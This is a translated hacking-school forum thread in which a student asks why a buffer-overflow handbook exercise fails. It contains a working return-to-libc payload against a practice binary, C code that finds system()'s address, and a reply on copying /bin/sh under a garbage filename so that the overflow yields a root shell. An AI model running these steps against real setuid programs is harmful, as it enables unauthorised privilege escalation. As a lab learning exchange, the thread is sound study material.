System Hacking

   ygw0225
   BOF Handbook: question about the final practice exercise..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1725


Actually, there was already a post asking the same question as mine, so I read it, but I couldn't understand what the answer meant,
so I am asking the same question.

My result comes out differently from the steps in the handbook's lecture, and I am currently stuck T_T
--------------------------------------------------

[student@localhost chapter_21]$ /bin/bash2

--------------------------------------------------

--------------------------------------------------

[student@localhost chapter_21]$ export PATH=$PATH:.

--------------------------------------------------

-------------------------------------------------------------

[student@localhost chapter_21]$ cat > addr_of_system.c
#include <stdio.h>   /* printf */
#include <dlfcn.h>   /* dlopen, dlsym */

int main()
{
   long addr;
   void *handle;

   /* Load libc and look up where system() is mapped */
   handle = dlopen("/lib/libc.so.6", RTLD_LAZY);
   addr = (long)dlsym(handle, "system");
   printf("system() is at 0x%lx\n", addr);

   return 0;
}
(press Ctrl+D)
[student@localhost chapter_21]$
[student@localhost chapter_21]$ gcc -o ./addr_of_system addr_of_system.c -lc -ldl
[student@localhost chapter_21]$ ./addr_of_system
system() is at 0x40058ae0
[student@localhost chapter_21]$

--------------------------------------------------------------

-> After finding the address of system
----------------------------------------------------------------------------------------------------------

[student@localhost chapter_21]$ ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@
sh: ?¿C?? command not found
Segmentation fault
[student@localhost chapter_21]$

----------------------------------------------------------------------------------------------------------

When I type the command above, the lecture shows the output above, whereas I get the message below.

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(strange characters)
sh: syntax error near unexpected token '(strange characters)'
sh: -c: line 1: '(strange characters)'
Segmentation fault

What do I need to do to get the same result as the lecture?

  Hit : 3417     Date : 2014/01/08 01:34



    
cd80 Run ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf, then
in xxd ./asdfasdf find the hex string of the strange characters you mentioned, then
copy /bin/sh to a file named with those strange characters, along the lines of cp /bin/sh $(perl -e 'print "\x~~\x~~\x~~"'), then
do export .:$PATH and once more try
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
Give it a try.
2014/01/08  
ygw0225 Wow, thank you! After doing as you said, I obtained a root shell.
However, I have not fully understood it, so I would like to ask a few questions.

1. I did exactly what you described in the comment above. After doing as you said, when I enter the fifth line (of the comment above),
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`, am I supposed to get a root shell right away,
or is it a step for turning the syntax error into sh: ?¿C?? command not found, as in the lecture?
After following your instructions it came out as sh: ?¿C?? command not found, so I checked the hex string between system(),
created a link file, linked it, and confirmed it... So in the end, do I have to repeat the same thing?

2. When I run ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf like this, the file is created, but
xxd asdfasdf shows nothing. With 2>asdfasdf .. that is, only when I put a 2 in front does xxd show it properly. What is the difference?

3. In ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`, what does the . (dot) between x84 and "\xe... mean?
2014/01/08  
cd80 1.
The first ./vuln ~~~~ is the command that puts the error message containing sh: ?¿C?? command not found into asdfasdf,
and the garbled characters between sh: and command are the string that was actually passed as the argument to system(), which it tried and failed to execute as a program name.
So you actually create a program with this string as its name, so that it can be executed.

When attacking with the method you are using, you have to repeat the same process.
The technique you are using now is called RTL;
https://research.hackerschool.org:8080/Datas/Research_Lecture/[6%C2%F7]_Return_to_Lib_%B1%E2%B9%FD_%C0%CC%C7%D8%C7%CF%B1%E2.txt
it is a good idea to study with this document, or with the documents and posts that come up when you search Google for "rtl 공격" ("RTL attack").
https://research.hackerschool.org:8080/Html/WG_Documents.html
There are many system hacking documents here, so have a look~

2.
Ah, the 2> was there to redirect stderr.
On Linux, three fds are used for fixed purposes:
0 is stdin, 1 is stdout, and 2 is stderr.
The program name is in the error message, so you have to redirect stderr.

3. The dot was a mistake on my part, lol. It does work with a dot, though;
it is the syntax for joining two strings.
It works with a comma and it works with a dot.
2014/01/11  
ygw0225 cd80! Thank you so much... I am trying to learn step by step, one thing at a time, but it really isn't easy ^^; 2014/01/11  
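
The stdout/stderr split described in cd80's answer 2, as an added example that is not part of the thread: a child shell prints one line itself and then fails to run a command, and the script reports which capture file each piece of text landed in. `DEMO_CMD` is a constructed name assumed not to exist on PATH, and `run_child`, `where_is` and `demo` are hypothetical helper names.

```shell
#!/bin/sh
# Added example: which file descriptor carries the shell's diagnostic.
# DEMO_CMD is a constructed command name that is assumed not to exist.
DEMO_CMD="no_such_command_demo"

# run_child OUT ERR: start a child shell that writes one line to stdout and
# then tries to run DEMO_CMD; fd 1 is saved to OUT, fd 2 is saved to ERR.
run_child() {
    sh -c "echo 'your input is AAAA'; $DEMO_CMD" >"$1" 2>"$2" || true
}

# where_is PATTERN OUT ERR: print which capture file contains PATTERN.
where_is() {
    in_out=no; in_err=no
    grep -q -- "$1" "$2" && in_out=yes
    grep -q -- "$1" "$3" && in_err=yes
    case "$in_out$in_err" in
        yesyes) echo both ;;
        yesno)  echo stdout ;;
        noyes)  echo stderr ;;
        *)      echo none ;;
    esac
}

# demo: run the child once with split captures and once with fd 2 merged.
demo() {
    dir=$(mktemp -d) || return 1
    run_child "$dir/out" "$dir/err"
    printf 'program text     -> %s\n' \
        "$(where_is 'your input is' "$dir/out" "$dir/err")"
    printf 'shell diagnostic -> %s\n' \
        "$(where_is "$DEMO_CMD" "$dir/out" "$dir/err")"
    # 2>&1 placed after the file redirection sends fd 2 to the same file,
    # so both pieces of text end up in one capture.
    sh -c "echo 'your input is AAAA'; $DEMO_CMD" >"$dir/all" 2>&1 || true
    printf 'with 2>&1        -> %s\n' \
        "$(where_is "$DEMO_CMD" "$dir/all" /dev/null)"
    rm -rf "$dir"
}

demo
```

A plain `>` only redirects fd 1, so the shell's "not found" diagnostic never reaches that file; it is written to fd 2 and needs `2>` (or `2>&1`) to be captured.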